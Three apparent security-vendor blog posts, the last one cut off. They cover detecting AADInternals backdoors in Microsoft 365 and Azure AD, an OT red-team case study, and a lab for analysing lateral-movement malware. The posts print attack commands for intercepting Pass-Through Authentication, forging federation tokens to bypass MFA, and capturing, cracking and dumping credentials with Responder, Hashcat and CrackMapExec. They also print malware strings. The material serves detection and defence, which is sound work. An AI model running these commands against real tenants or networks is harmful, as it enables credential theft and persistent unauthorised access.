
Detecting Microsoft 365 and Azure Active Directory Backdoors

Mandiant has seen an uptick in incidents involving Microsoft 365 (M365) and Azure Active Directory (Azure AD). Most of these incidents are the result of a phishing email coercing a user into entering their M365 credentials into a phishing site. Other incidents have been the result of password spraying, credential stuffing, or simple brute force attempts against M365 tenants. In almost all of these incidents, the targeted user or account was not protected by multi-factor authentication (MFA).

These opportunistic attacks are certainly the most common form of compromise for M365 and Azure AD, and are usually the initial vector to establish persistence. During both incident response (IR) engagements and proactive cloud assessments we are often asked:

  • What are some other types of attacks that Mandiant is seeing against M365 and Azure AD?
  • Is it possible for an on-premises compromise to “vertically” move to M365 and Azure AD?
  • If a global administrator account is compromised, is it possible to maintain persistence even after the compromised account has been detected, a password reset has occurred, and MFA has been applied?

AADInternals PowerShell Module

In some incidents, Mandiant has witnessed attackers utilizing a PowerShell module called AADInternals, which can allow an attacker to vertically move from on-premises to Azure AD, establish backdoors, steal passwords, generate user security tokens, and bypass MFA protections. This PowerShell module has allowed attackers to maintain persistence in the tenant even after initial eradication efforts were conducted.

To see this module in action and understand how it works, Dr. Nestori Syynimaa’s PSCONFEU 2020 presentation, Abusing Azure Active Directory: Who would you like to be today?, provides an in-depth overview of the module.

To detect the use of AADInternals, it is important to understand how some of these attacks work. Once an understanding is established, abnormal usage can be detected through a combination of log analysis and host-based indicators.

Backdoor 1: Abusing Pass-Through Authentication

Attacker Requirements

  • Local Administrative Access to a server running Pass-through Authentication

Or

  • M365 global administrator credentials

The AADInternals PowerShell module contains a function called Install-AADIntPTASpy. The function works by inserting itself as a man-in-the-middle within the Pass-through Authentication (PTA) process that occurs between Azure AD and the server running the PTA Agent in the on-premises environment. Commonly, the PTA Agent runs on the same on-premises server as Azure AD Connect (AAD Connect).

When PTA is enabled, every logon that occurs against Azure AD gets redirected to the PTA Agent on-premises. The PTA Agent asks an on-premises Active Directory Domain Controller if a password is valid for an authenticating account. If valid, the PTA Agent responds back to Azure AD to grant the requestor access. Figure 1 provides the workflow of Pass-through Authentication and where AADInternals can intercept the request.


Figure 1: Pass-through Authentication workflow

Once the function is running, every PTA attempt against Azure AD will be intercepted by the installed AADIntPTASpy module. The module will record the user’s password attempt and reply back to Azure AD on behalf of the PTA Agent. This reply advises Azure AD the password attempt was valid and grants the user access to the cloud, even if the password is incorrect. If an attacker has implanted AADIntPTASpy, they can log in as any user that attempts to authenticate using PTA—and will be granted access.

Additionally, all password attempts intercepted by the AADIntPTASpy module are recorded in a log file on the server (default location: C:\PTASpy\PTASpy.csv). Figure 2 shows how the log file can be decoded to reveal a user's password in cleartext.


Figure 2: PTASpy.csv decoded passwords
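
For defenders reproducing this in a lab, the module itself can decode the log. The following is a minimal sketch, assuming the cmdlet name and default log path documented for AADInternals:

Import-Module AADInternals
# Decode the intercepted password attempts from the default log (C:\PTASpy\PTASpy.csv)
Get-AADIntPTASpyLog -DecodePasswords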

Not only does this function allow an attacker to log in as any user who authenticates via PTA, it also acts as a repository of passwords harvested from users who are legitimately logging into Azure AD. This could allow an attacker to pivot to other areas of the network—or use these credentials against other internet-accessible portals that may leverage single-factor authentication (e.g., a VPN gateway).

An attacker can use this module in one of two ways:

Method 1: On-Premises Compromise

An attacker has gained access to an on-premises domain and is able to laterally move to the AADConnect / PTA Agent Server. From this server, an attacker can potentially leverage the AADInternals PowerShell module and invoke the Install-AADIntPTASpy function.
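
As a minimal sketch of Method 1 (function names as documented for AADInternals; this is illustrative, not the exact tradecraft observed):

# Run from an elevated PowerShell session on the AAD Connect / PTA Agent server
Import-Module AADInternals
# Injects into the PTA Agent and begins approving and recording all password attempts
Install-AADIntPTASpy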

Method 2: Cloud Compromise

If an attacker has successfully compromised an Azure AD global admin account, an attack can be conducted from an attacker’s own infrastructure. An attacker can install a PTA Agent on a server they manage and register the agent using the compromised global administrator account (Figure 3).


Figure 3: Azure AD Portal—registered Pass-through Authentication agents

Once registered with Azure AD, the rogue server will begin to intercept and authorize all login attempts. As with Method 1, this server can also be used to harvest valid credentials.
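
A hedged sketch of Method 2, assuming the AADInternals agent-registration functions and a placeholder machine name:

# Run from attacker-controlled infrastructure using compromised global administrator credentials
Import-Module AADInternals
Get-AADIntAccessTokenForPTA -SaveToCache
# Registers a rogue PTA Agent that will appear in the Azure AD portal (Figure 3)
Register-AADIntPTAAgent -MachineName "example-aadc.company.com"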

Backdoor 2: Abusing Identity Federation

Attacker Requirements

  • Local administrative access to AD and server running Active Directory Federation Services

Or

  • M365 global administrator credentials

Another method of authenticating to M365 is through the use of federation services. When an M365 domain is configured as a federated domain, a trust is configured between M365 and an external identity provider. In many cases, this trust is established with an Active Directory Federation Services (ADFS) server for an on-premises Active Directory domain.

Once a trust is established, when a user logs into M365 using a federated domain, their request is redirected to the external identity provider (ADFS), where their authentication is validated (Figure 4). Once validated, the ADFS server provides the user a security token. This token is trusted by M365 and grants the user access to the platform.


Figure 4: Microsoft 365 Federation Sign-in workflow

AADInternals has a PowerShell function to craft security tokens that mimics the ADFS authentication process. Given a valid UserPrincipalName, ImmutableId, and IssuerURI, an attacker can generate a security token as any user in the tenant. More concerning still, a token generated this way allows an attacker to bypass MFA.

As with Backdoor 1, this attack can either be performed from a compromised on-premises environment or from an attacker’s own infrastructure.

Method 1: On-Premises Compromise

Once an attacker has gained access to an on-premises domain with elevated access, they can begin to collect the required information to craft their own security tokens to backdoor into M365 as any user. An attacker will require:

  • A valid UserPrincipalName and ImmutableId.
    • Both of these attributes can be pulled from the on-premises Active Directory domain.
  • The IssuerURI of the ADFS server and the ADFS signing certificate.
    • These can be obtained from the ADFS server, either while logged directly into the server or by querying it remotely with a privileged account.

Once an attacker has collected the necessary information, using the AADInternals Open-AADIntOffice365Portal command, a security token for the user can be generated granting an attacker access to M365 (Figure 5).


Figure 5: AADInternals Open-AADIntOffice365Portal command
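
As an illustration of the command shown in Figure 5, a hedged sketch follows; every value is a placeholder, and the parameter names follow the AADInternals documentation:

# Forge a security token for the target user and open the O365 portal, bypassing MFA
Open-AADIntOffice365Portal -ImmutableID "UQ989+t6fEq9/0ogYtt1pA==" `
    -Issuer "http://sts.company.com/adfs/services/trust" `
    -PfxFileName .\ADFSSigningCertificate.pfx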

Method 2: Cloud Compromise

If an attacker has compromised an M365 global administrator account, the attack can be conducted entirely from the attacker's own infrastructure, using that administrative access to collect user information and reconfigure the tenant to establish the backdoor. In this method, an attacker will require:

  • A valid UserPrincipalName and valid ImmutableId.
    • Figure 6 shows how the Get-MsolUser command can obtain a user’s ImmutableId from Azure AD.


Figure 6: Get-MsolUser—list user UPN & ImmutableId

  • IssuerURI
    • This can be obtained by converting a managed domain to a federated domain. Figures 7 through 10 show how the AADInternals ConvertTo-AADIntBackdoor command (Figure 8) can be used to allow an attacker to register their own IssuerURI for a federated domain; a hedged command sketch follows Figure 10.


Figure 7: Get-msoldomain—list of registered domains and authentication


Figure 8: ConvertTo-AADIntBackdoor—convert domain to federated authentication


Figure 9: Changed authentication method


Figure 10: Azure AD Portal registered domains
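
Taken together, the steps in Figures 6 through 10 could be sketched as follows. This is a hedged sketch: the MSOnline cmdlets are documented, the AADInternals parameter naming follows its documentation at the time of writing, and the domain value is a placeholder:

# Connect with the compromised global administrator account, then list UPNs and ImmutableIds
Connect-MsolService
Get-MsolUser | Select-Object UserPrincipalName, ImmutableId
# Convert a registered domain to federated authentication with an attacker-controlled IssuerURI
Get-AADIntAccessTokenForAADGraph -SaveToCache
ConvertTo-AADIntBackdoor -Domain "newdomain.com"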

Note: To avoid interrupting production authentication for an existing federated domain (and to remain undetected), an attacker may opt to register a new domain with the tenant.


Figure 11: AADInternals Open-AADIntOffice365Portal Command using new Federated domain

Once an attacker has properly configured the tenant, using the ImmutableId of any user, a security token can be generated by executing the Open-AADIntOffice365Portal command (Figure 11). This allows an attacker to log in as that user without the need for a valid certificate or a legitimate IssuerURI.

Fortunately for defenders, this method will generate a number of events in the unified audit log, which can be leveraged for monitoring and alerting.

Mitigation and Detection

Once persistence is established, it can be extremely difficult to detect login activity that is using one of the previously described methods. Because of this, we recommend monitoring and alerting on M365 unified audit logs and Azure AD sign-in activity to detect anomalous activity.

Detection in FireEye Helix

Because Mandiant has seen this methodology used in the wild, we felt it was necessary to build these detections into our FireEye Helix security platform. Helix engineers have created several new detection rules that monitor for detectable activity of an attacker making use of the AADInternals PowerShell module.

The following five rules will monitor a server’s event logs and alert upon the installation and usage of the AADInternals PowerShell module (Figure 12). The detection of these activities could be high fidelity alerts that an attacker is preparing to configure backdoors into M365 and Azure AD environments.


Figure 12: AADInternals Helix rules

If an attacker has successfully configured a backdoor using AADInternals, Helix will alert on the following events registered in the Office 365 unified audit log and Azure Activity Log as indicators of possible backdoor activity (Figure 13 and Figure 14). It is important to note that these alerts can also be triggered by legitimate administrator activity. When responding to these alerts, first check with your M365 and Azure AD administrators to verify the activity before raising a security event.


Figure 13: Office 365 and Azure Helix rules


Figure 14: PTA Connector Registered alert description

Hunting for Backdoors in M365 Unified Audit Logs and Azure AD Logs

If you suspect a global administrator account was compromised and you want to review Azure AD for indicators of potential abuse, the following should be reviewed (note that these same concepts can be used for proactive log monitoring):

  • From the Azure AD Sign-ins logs, monitor logon activity for the On-Premises Directory Synchronization Service Account. This account is used by the Azure AD Connect service (Figure 15).


Figure 15: Azure AD Sign-ins

  • Baseline the IP addresses used by this account and make sure the IPs match those assigned to the on-premises WAN infrastructure. If an attacker has configured a PTA Agent on their own infrastructure, an IP that does not match your baseline could be an indicator that a rogue PTA Agent has been configured by the attacker (Figure 16).


Figure 16: Azure AD Sign-in logs—On-Premises Directory Synchronization Services account

  • From Azure AD Sign-ins, monitor and baseline Azure AD sign-ins to the Azure AD Application Proxy Connector. Make sure to validate the username, IP, and location.
    • These events are typically only generated when a new PTA Agent is connected to the tenant, so they could indicate that an attacker has connected a rogue PTA server hosted on the attacker's infrastructure (Figure 17).


Figure 17: Azure AD Sign-in logs—Azure AD Application Proxy Connector

If using Azure Sentinel, this event will also be registered in the Azure AuditLogs table as a “Register Connector” OperationName (Figure 18).


Figure 18: Register Connector—Azure Sentinel logs

  • In the Azure Management Portal under the Azure AD Connect blade, review all registered servers running PTA Agent. The Authentication Agent and IP should match your infrastructure (Figure 19).
    • Log in to https://portal.azure.com
      • Select Azure AD Connect > Pass-through Authentication


Figure 19: Azure Active Directory Pass-through Authentication agent status

  • Monitor and alert on "Directory Administration Activity" in the Office 365 Security & Compliance Center's unified audit log. When an attacker creates a domain federation within a compromised cloud tenant and links it to attacker-owned infrastructure, this generates activity in the log (Figure 21); a hedged query sketch follows Figure 21.
    • https://protection.office.com/unifiedauditlog > Audit Log Search
    • Select the Directory Administration Activities category to select all activities
    • Create New Alert Policy (Figure 20)


Figure 20: Unified Audit Log > Create new alert policy


Figure 21: Unified Audit Log filtered for domain related events
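
As a hedged complement to the alert policy, the same operations can be pulled on demand with the Exchange Online Search-UnifiedAuditLog cmdlet; the date window and result size below are arbitrary examples:

# Pull recent domain-administration operations from the unified audit log
Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-7) -EndDate (Get-Date) `
    -Operations "Set-AcceptedDomain","Set-MsolDomainFederationSettings","Add-FederatedDomain","New-AcceptedDomain","Remove-AcceptedDomain","Remove-FederatedDomain" `
    -ResultSize 5000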

  • Using Azure Sentinel, more granular Directory Administration Activities can be monitored for suspicious activity. This includes additions, deletions, and modifications of domains and their authentication settings (Figure 22).
    • Monitoring for OfficeActivity Operations in Azure Sentinel can allow an organization to validate if this is normalized activity or if an attacker is working on setting up a backdoor for PTA or federation.
      • Table: OfficeActivity
        • Operation: Set-AcceptedDomain
        • Operation: Set-MsolDomainFederationSettings
        • Operation: Add-FederatedDomain
        • Operation: New-AcceptedDomain
        • Operation: Remove-AcceptedDomain
        • Operation: Remove-FederatedDomain


Figure 22: OfficeActivity Operations Azure Sentinel logs

Detection On-Premises

If an attacker is able to compromise on-premises infrastructure and access a server running AD Connect or ADFS services with the intention of leveraging a tool such as AADInternals to expand the scope of their access to include cloud, timely on-premises detection and containment is key. The following methods can be leveraged to ensure optimized visibility and detection for the scope of activities described in this post:

  • Treat ADFS and Azure AD Connect servers as Tier 0 assets.
    • Use a dedicated server for each role, and do not install these roles on servers that also host other functions. All too often we see Azure AD Connect running on a file server.
  • Ensure PowerShell logging is optimized on AD Connect and ADFS servers
  • Review Microsoft-Windows-PowerShell/Operational event logs on ADFS and AAD Connect servers.
    • If PowerShell logging is enabled, search for Event ID 4101. This event ID records the installation of AADInternals (Figure 23); a hedged search sketch follows Figure 23.


Figure 23: Event ID 4101—installed module
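
A hedged search sketch for these events (the Event ID value is taken from this post; the string match is an assumption about the message contents):

Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4101 } |
    Where-Object { $_.Message -match 'AADInternals' } |
    Select-Object TimeCreated, Message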

  • Additionally, with this logging enabled, you will be able to review the PowerShell commands used by an attacker.
    • In PowerShell, run Get-Module -All and look for the presence of AADInternals (Figure 24).


Figure 24: Get-Module command to list installed modules

  • Alert for the presence of C:\PTASpy and C:\PTASpy\PTASpy.csv.
    • This is the default location of the log file that contains records of all the accounts that were intercepted by the tool. Remember, an attacker may also use this file to harvest credentials, so it is important to reset the passwords for these accounts (Figure 25). A simple check sketch follows Figure 25.


Figure 25: PTASpy.csv log activity
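
A simple check for the default artifact path could be sketched as follows (the warning text is illustrative):

# Alert if the default PTASpy output exists on this host
if (Test-Path 'C:\PTASpy\PTASpy.csv') {
    Write-Warning "PTASpy log found on $env:COMPUTERNAME - possible AADInternals PTA backdoor"
}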

Mitigations

In order for this attack to be successful, an attacker must gain administrative privileges on a server running Azure AD Connect and/or gain global administrator rights within M365. Simple practices such as limiting and properly protecting global administrator accounts, as well as properly protecting Tier 0 assets, can greatly reduce the risk of an attacker successfully using the AADInternals PowerShell module against your organization.

  • Limit or restrict access to Azure AD Connect servers.
    • Any server acting as an identity provider or facilitating identity federation should be treated as a Tier 0 asset.
  • Create separate dedicated global administrator accounts.
    • Global administrators should be cloud-only accounts.
    • These accounts should not retain any licensing.
  • Implement MFA on all accounts: admins, users and services.
    • If a particular account cannot use MFA, apply a conditional access rule that limits its logon to a trusted network. This works particularly well for service accounts.  
  • Establish a roadmap to block legacy authentication.
  • Limit which accounts are synced from on-premises to the cloud.
    • Do not sync privileged or service accounts to the cloud.
  • Use Azure administrative roles.
    • Not everybody or everything needs to be a global admin to administer the environment.
  • Use password hash sync over Pass-through Authentication.
    • Many organizations are reluctant to sync their passwords to Azure AD. The benefits of this service greatly outweigh the risks. Being able to use global and custom banned password lists, for both the cloud and on-premises, is a tremendous benefit.
  • Forward all M365 unified audit logs and Azure logs to a SIEM and build detections.
    • Ensure you are forwarding the logs recommended in this post and building the appropriate detections and playbooks within your security operations teams.
    • Specifically monitor for:
      • Set-AcceptedDomain
      • Set-MsolDomainFederationSettings
      • Add-FederatedDomain
      • New-AcceptedDomain
      • Remove-AcceptedDomain
      • Remove-FederatedDomain
  • Periodically review all identity providers and custom domains configured in the M365 tenant.
    • If an attacker is successful at gaining global administrative privileges, they may choose to add their own identity provider and custom domain to maintain persistence.

Acknowledgements

I want to give a special thanks to Daniel Taylor, Roberto Bamberger and Jennifer Kendall at Microsoft for collaborating with Mandiant on the creation of this blog post.

A Hands-On Introduction to Mandiant’s Approach to OT Red Teaming

Operational technology (OT) asset owners have historically considered red teaming of OT and industrial control system (ICS) networks to be too risky due to the potential for disruptions or adverse impact to production systems. While this mindset has remained largely unchanged for years, Mandiant's experience in the field suggests that these perspectives are changing; we are increasingly delivering value to customers by safely red teaming their OT production networks.

This increasing willingness to red team OT is likely driven by several factors, including the growing number and visibility of threats to OT systems, the increasing adoption of IT hardware and software into OT networks, and the maturing of OT security teams. In this context, we deemed it relevant to share some details on Mandiant's approach to red teaming in OT based on years of experience supporting customers learning about tangible threats in their production environments.

In this post we introduce Mandiant's approach to OT red teaming and walk through a case study. During that engagement, it took Mandiant only six hours to gain administrative control of the OLE for Process Control (OPC) servers and clients in the target's Distributed Control System (DCS) environment. We then used this access to collect information and develop an attack scenario simulating the path a threat actor could take to prepare for and attack the physical process (we highlight that the red team did not rely on weaknesses in the DCS itself, but instead on weak password implementations in the target environment).

NOTE: Red teaming in OT production systems requires planning, preparation and "across the aisle" collaboration. The red team must have deep knowledge of industrial process control and the equipment, software, and systems used to achieve it. The red team and the asset owner must establish acceptable thresholds before performing any activities.

Visit our website for more information or to request Mandiant services or threat intelligence.

Mandiant's Approach for Safe Red Teaming in OT

Mandiant's approach to red teaming OT production systems consists of two phases: active testing on IT and/or OT intermediary systems, and custom attack modeling to develop one or more realistic attack scenarios. Our approach is designed to mirror the OT-targeted attack lifecycle—with active testing during initial stages (Initial Compromise, Establish Foothold, Escalate Privileges, and Internal Reconnaissance), and a combination of active/passive data collection and custom threat modeling to design feasible paths an attacker would follow to complete the mission.


Figure 1: Mandiant OT red teaming approach

  • Mandiant's OT red teaming may begin either from the perspective of an external attacker leveraging IT compromises to pivot into the OT network, or from the perspective of an actor who has already gained access into the OT network and is ready to escalate the intrusion.
  • We then leverage a range of commodity tools and utilities that are widely available in most target environments to pivot across OT intermediary systems and gain privileged access to target ICS.
  • Throughout this process, we maintain constant communication with the customer to establish safety thresholds. Active participation from the defenders will also enable the organization to learn about the techniques we use to extract information and the weaknesses we exploit to move across the target network.
  • Once the active testing stops at the agreed safety threshold, we compile this information and perform additional research on the system and processes to develop realistic and target-specific attack scenarios based on our expertise of threat actor behaviors.

Mandiant's OT red teaming can be scoped in different ways depending on the target environment, the organization's goals, and the asset owner's cyber security program maturity. For example, some organizations may test the full network architecture, while others prefer to sample only an attack on a single system or process. This type of sampling is useful for organizations that own a large number of processes and are unlikely to test them one by one; instead, they can learn from a single use case that reflects target-specific weaknesses and vulnerabilities. Depending on the scope, the red teaming results can be tailored to:

  • Model attack scenarios based on target-specific vulnerabilities and determine the scope and consequences if a threat actor were to exploit them in their environment.
  • Model attack paths across the early stages of reconnaissance and lateral movement to identify low-hanging fruit that adversaries may exploit to enable further compromise of OT.
  • Operationalize threat intelligence to model scenarios based on tactics, techniques, and procedures (TTPs) from known actors, such as advanced persistent threats (APTs).
  • Test specific processes or systems deemed at high risk of causing a disruption to safety or operations. This analysis highlights gaps or weaknesses to determine methods needed to secure high-risk system(s).

Red Teaming in OT Provides Unique Value to Defenders

Red teaming in OT can be uniquely helpful for defenders, as it generates value in a way very specific to an organization's needs, while decreasing the gap between the "no holds barred" world of real attackers and the "safety first" responsibility of the red team. While it is common for traditional red teaming engagements to end shortly after the attacker pivots into a production OT segment, a hybrid approach, such as the one we use, makes it possible for defenders to gain visibility into the specific strengths and weaknesses of their OT networks and security implementations. Here are some other benefits of red teaming in OT production networks:

  • It helps defenders understand and foresee possible paths that sophisticated actors may follow to reach specific goals. While cyber threat intelligence is another great way to build this knowledge, red teaming allows for additional acquisition of site-specific data.
  • It responds to the needs of defenders to account for varying technologies and architectures present in OT networks across different industries and processes. As a result, it accounts for outliers that are often not covered by general security best practices guidance.
  • It results in tangible and realistic outputs based on our active testing showing what can really happen in the target network. Mandiant's OT red teaming results often show that common security testing tools are sufficient for actors to reach critical process networks.
  • It results in conceptual attack scenarios based on real attacker behaviors and specific knowledge about the target. While the scenarios may sometimes highlight weaknesses or vulnerabilities that cannot be patched, they provide defenders with the knowledge needed to define alternative mitigations that reduce risk earlier in the lifecycle.
  • It can help to identify real weaknesses that could be exploited by an actor at different stages of the attack lifecycle. With this knowledge, defenders can define ways to stop threat activity before it reaches critical production systems, or at least during early phases of the intrusion.

Applying Our Approach in the Real World: Big Steam Works

During this engagement, we were tasked with gaining access to critical control systems and designing a destructive attack in an environment where industrial steaming boilers are operated with a Distributed Control System (DCS). In this description, we redacted customer information—including the name, which we refer to as "Big Steam Works"—and altered sensitive details. However, the overall attack techniques remain unchanged. The main objective of Big Steam Works is to deliver steam to a nearby chemical production company.

For the scope of this red team, the customer wanted to focus entirely on its OT production network. We did not perform any tests in IT networks and instead began the engagement with initial access granted in the form of a static IP address in Big Steam Works' OT network. The goal of the engagement was to deliver consequence-driven analysis exploring a scenario that could cause a significant physical impact to both safety and operations. Following our red teaming approach, the engagement was divided into two phases: active testing across IT and/or OT intermediary systems, and custom attack modeling to foresee paths an attacker may follow to complete their mission.

We note that during the active testing phase we were very careful to maintain high safety standards. This required not only highly skilled personnel with knowledge about both IT and OT, but also constant engagement with the customer. Members from Big Steam Works helped us to set safety thresholds to stop and evaluate results before moving forward, and actively monitored the test to observe, learn, and remain vigilant for any unintended changes in the process.

Phase 1 – Active Testing

During this phase, we leveraged publicly available offensive security tools (including Wireshark, Responder, Hashcat, and CrackMapExec) to collect information, escalate privileges, and move across the OT network. In close to six hours, we achieved administrative control of several of Big Steam Works' OLE for Process Control (OPC) servers and clients in their DCS environment. We highlight that the test did not rely on weaknesses in the DCS itself, but instead on weak password implementations in the target environment. Figure 2 details our attack path:


Figure 2: Active testing in Big Steam Works' OT network

  1. We collected network traffic using Wireshark to map network communications and identify protocols we could use for credential harvesting, lateral movement, and privilege escalation. Passive analysis of the capture showed Dynamic Host Configuration Protocol (DHCP) broadcasts for IPv6 addresses, Link-Local Multicast Name Resolution (LLMNR) protocol traffic, and NetBios Name Service (NBT-NS) traffic.
  2. We responded to broadcast LLMNR, NBT-NS, and WPAD name resolution requests from devices using a publicly available tool called Responder. As we supplied our IP address in response to broadcasted name resolution requests from other clients on the subnet, we performed man-in-the-middle (MiTM) attacks and obtained NTLMv1/2 authentication protocol password hashes from devices on the network.
  3. We then used Hashcat to crack the hashed credentials and use them for further lateral movement and compromise. The credentials we obtained included, but were not limited to, service accounts with local administrator rights on OPC servers and clients. We note that Hashcat cracked the captured credentials in only six seconds due to the lack of password strength and complexity.
  4. With the credentials captured in the first three steps, we accessed other hosts on the network using CrackMapExec. We dumped additional cached usernames, passwords, and password hashes belonging to both local and domain accounts from these hosts.
  5. This resulted in privileged access and control over the DCS's OPC clients and servers in the network. While we did not continue to execute any further attack, the level of access gained at this point enabled us to perform further reconnaissance and data collection to design and conceptualize the last steps of a targeted attack on the industrial steaming boilers.

The TTPs we used during the active testing phase resemble some of the simplest resources that can be used by threat actors during real OT intrusions. The case results are concerning given that they illustrate only a few of the most common weaknesses we often observe across Mandiant OT red team engagements. We highlight that all the tools used for this intrusion are known and publicly available. An attacker with access to Big Steam Works could have used these methods as they represent low-hanging fruit and can often be prevented with simple security mitigations.
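
For reference, the attack path in Figure 2 can be approximated with standard invocations of those public tools. The interface, file names, credentials, and subnet below are placeholders, not the commands used on the engagement:

# Poison LLMNR/NBT-NS name resolution and capture NetNTLM hashes (Responder)
responder -I eth0 -w
# Crack the captured NetNTLMv2 hashes with a wordlist (Hashcat mode 5600)
hashcat -m 5600 captured-hashes.txt wordlist.txt
# Reuse cracked credentials across hosts and dump additional cached credentials (CrackMapExec)
crackmapexec smb 10.0.0.0/24 -u svc_opc -p 'CrackedPassword1' --sam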

Phase 2 – Custom Attack Modeling

For roughly a week, Mandiant gathered additional information from client documentation and research on industrial steaming boilers. We then mirrored the process an attacker would follow to design a destructive attack on the target process given the results achieved during phase 1. At this point of the intrusion, the attacker would have already obtained complete control over Big Steam Works' OPC clients and servers, gaining visibility and access to the DCS environment.

Before defining the path to follow, the attacker would likely have to perform further reconnaissance (e.g., compromising additional systems, data, and credentials within the Big Steam Works DCS environment). Specifically, the attacker could:

  • Gain access to the DCS configuration software/engineering workstation
  • Obtain configuration/control logic files
  • Determine the type/function of the different DCS nodes in the environment
  • Use native DCS tools for system overview, graphics display, and point drill down
  • Identify alarms/alerts monitored by operators via remote HMI screens and map them to defined points
  • Map the flow of the physical process based on data collection and review

Our next step was to develop the custom scenario. For this example, we were tasked with modeling a case where the attacker was attempting to create a condition that had a high likelihood of causing physical damage and disruption of operations (see Figure 3). In this scenario, the attacker attempted to achieve this by lowering the water level in a boiler drum below the safe threshold while not tripping the burner management system or other safety mechanisms. If successful, this would result in rapid and extreme overheating in the boiler. Opening the feedwater valve under such conditions could result in a catastrophic explosion.


Figure 3: Custom attack model diagram for Big Steam Works

Figure 3 describes how a real attacker might pursue their mission after gaining access to the OPC servers and clients. As the actor moves closer to their goals, it becomes more difficult to assess both the probability of success and the actual impact of their actions due to nuances specific to the client environment and additional safety and security controls built into the process. However, the analysis holds significant value as it illustrates the overall structure of the physical process and potential attacker behaviors aimed at achieving specific end goals. Furthermore, it proceeds directly from the results obtained during the first phase of the red teaming.

The model presents one feasible combination of actions that an attacker could perform to access devices governing the boiler drum and modify the water level while remaining undetected. With the level of access obtained from phase 1, the attacker would likely be able to compromise engineering workstations (EWS) for the boiler drum's controller using similar tools. This would likely enable the actor to perform actions such as changing the drum level setpoints, modifying the flow of steam scaling, or modifying water flow scaling. While the model does not reflect all additional safety and security measures that may be present deeper in the process, it does account for the attacker's need to modify alarms and control sensor outputs to remain undetected.

By connecting the outcomes produced in the test to the potential physical impacts and motivations involved in a real attack, this model provided Big Steam Works with a realistic overview of cyber security threats to a specific physical process. Further collaboration with the customer enabled us to validate the findings and support the organization to mitigate the risks reflected in the model.

Outlook

Mandiant's OT red teaming supports organizations by combining both the hands-on analysis of vulnerabilities and weaknesses in IT and OT networks with the conceptual modeling of attacker goals and possible avenues to reach specific outcomes. It also enables security practitioners to adopt the attacker's perspective and explore attack vectors that might otherwise go unconsidered, despite being low-hanging fruit for OT intrusions.

Our approach presents realistic scenarios based upon technical evidence of intrusion activity upon OT intermediary systems in the tested network. In this way, it is tailored to support consequence-driven analysis of threats to specific critical systems and processes. This enables organizations to identify attack scenarios involving digital assets and determine safeguards that can best help to protect the process and ensure the safety of their facilities.

Head over to our website for more information or to request Mandiant services or threat intelligence.

Configuring a Windows Domain to Dynamically Analyze an Obfuscated Lateral Movement Tool

We recently encountered a large obfuscated malware sample that offered several interesting analysis challenges. It used virtualization that prevented us from producing a fully-deobfuscated memory dump for static analysis. Statically analyzing a large virtualized sample can take anywhere from several days to several weeks. Bypassing this time-consuming step presented an opportunity for collaboration between the FLARE reverse engineering team and the Mandiant consulting team which ultimately saved many hours of difficult reverse engineering.

We suspected the sample to be a lateral movement tool, so we needed an appropriate environment for dynamic analysis. Configuring the environment proved to be essential, and we want to empower other analysts who encounter samples that leverage a domain. Here we will explain the process of setting up a virtualized Windows domain to run the malware, as well as the analysis techniques we used to confirm some of the malware functionality.

Preliminary Analysis

When analyzing a new malware sample, we begin with basic static analysis, where we can often get an idea of what type of sample it is and what its capabilities might be. We can use this to inform the subsequent stages of the analysis process and focus on the relevant data. We begin with a Portable Executable analysis tool such as CFF Explorer. In this case, we found that the sample is quite large at 6.64 MB. This usually indicates that the sample includes statically linked libraries such as Boost or OpenSSL, which can make analysis difficult.

Additionally, we noticed that the import table includes eight dynamically linked DLLs with only one imported function each as shown in Figure 1. This is a common technique used by packers and obfuscators to import DLLs that can later be used for runtime linking, without exposing the actual APIs used by the malware.


Figure 1: Suspicious imports

Our strings analysis confirmed our suspicion that the malware would be difficult to analyze statically. Because the file is so large, there were over 75,000 strings to consider. We used StringSifter to rank the strings according to relevance to malware analysis, but we did not identify anything useful. Figure 2 shows the most relevant strings according to StringSifter.


Figure 2: StringSifter output

When we encounter these types of obstacles, we can often turn to dynamic analysis to reveal the malware's behavior. In this case, our basic dynamic analysis provided hope. Upon execution the sample printed a usage statement:

Usage: evil.exe [/P:str] [/S[:str]] [/B:str] [/F:str] [/C] [/L:str] [/H:str] [/T:int] [/E:int] [/R]
   /P:str -- path to payload file.
   /S[:str] -- share for reverse copy.
   /B:str -- path to file to load settings from.
   /F:str -- write log to specified file.
   /C -- write log to console.
   /L:str -- path to file with host list.
   /H:str -- host name to process.
   /T:int -- maximum number of concurrent threads.
   /E:int -- number of seconds to delay before payload deletion (set to 0 to avoid remove).
   /R -- remove payload from hosts (/P and /S will be ignored).
If /S specifed without value, random name will be used.
/L and /H can be combined and specified more than once. At least one must present.
/B will be processed after all other flags and will override any specified values (if any).
All parameters are case sensetive.

Figure 3: Usage statement

We attempted to unpack the sample by suspending the process and dumping the memory. This proved difficult as the malware exited almost instantly and deleted itself. We eventually managed to produce a partially-unpacked memory dump by using the commands in Figure 4.

sleep 2 && evil.exe /P:"C:\Windows\System32\calc.exe" /E:1000 /F:log.txt /H:some_host

Figure 4: Commands executed to run binary

We chose an arbitrary payload file and a large interval for payload deletion. We also provided a log filename and a hostname for payload execution. These parameters were designed to force a slower execution time so we could suspend the process before it terminated.

We used Process Dump to produce a memory snapshot after the two second delay. Unfortunately, virtualization still hindered static analysis and our sample remained mostly obfuscated, but we did manage to extract some strings which provided the breakthrough we needed.

Figure 5 shows some of the interesting strings we encountered that were not present in the original binary.

dumpedswaqp.exe
psxexesvc
schtasks.exe /create /tn "%s" /tr "%s" /s "%s" /sc onstart /ru system /f
schtasks.exe /run /tn "%s" /s "%s"
schtasks.exe /delete /tn "%s" /s "%s" /f
ServicesActive
Payload direct-copied
Payload reverse-copied
Payload removed
Task created
Task executed
Task deleted
SM opened
Service created
Service started
Service stopped
Service removed
Total hosts: %d, Threads: %d
SHARE_%c%c%c%c
Share "%s" created, path "%s"
Share "%s" removed
Error at hooking API "%S"
Dumping first %d bytes:
DllRegisterServer
DllInstall
register
install

Figure 5: Strings output from memory dump

Based on the analysis thus far, we suspected remote system access. However, we were unable to confirm our suspicions without providing an environment for lateral movement. To expedite analysis, we created a virtualized Windows domain.

This requires some configuration, so we have documented the process here to aid others when using this analysis technique.

Building a Test Environment

In the test environment, make sure to have clean Windows 10 and Windows Server 2016 (Desktop Experience) virtual machines installed. We recommend creating two Windows Server 2016 machines so the Domain Controller can be separated from the other test systems.

In VMware Virtual Network Editor on the host system, create a custom network with the following settings:

  • Under VMNet Information, select the “Host-only” radio button.
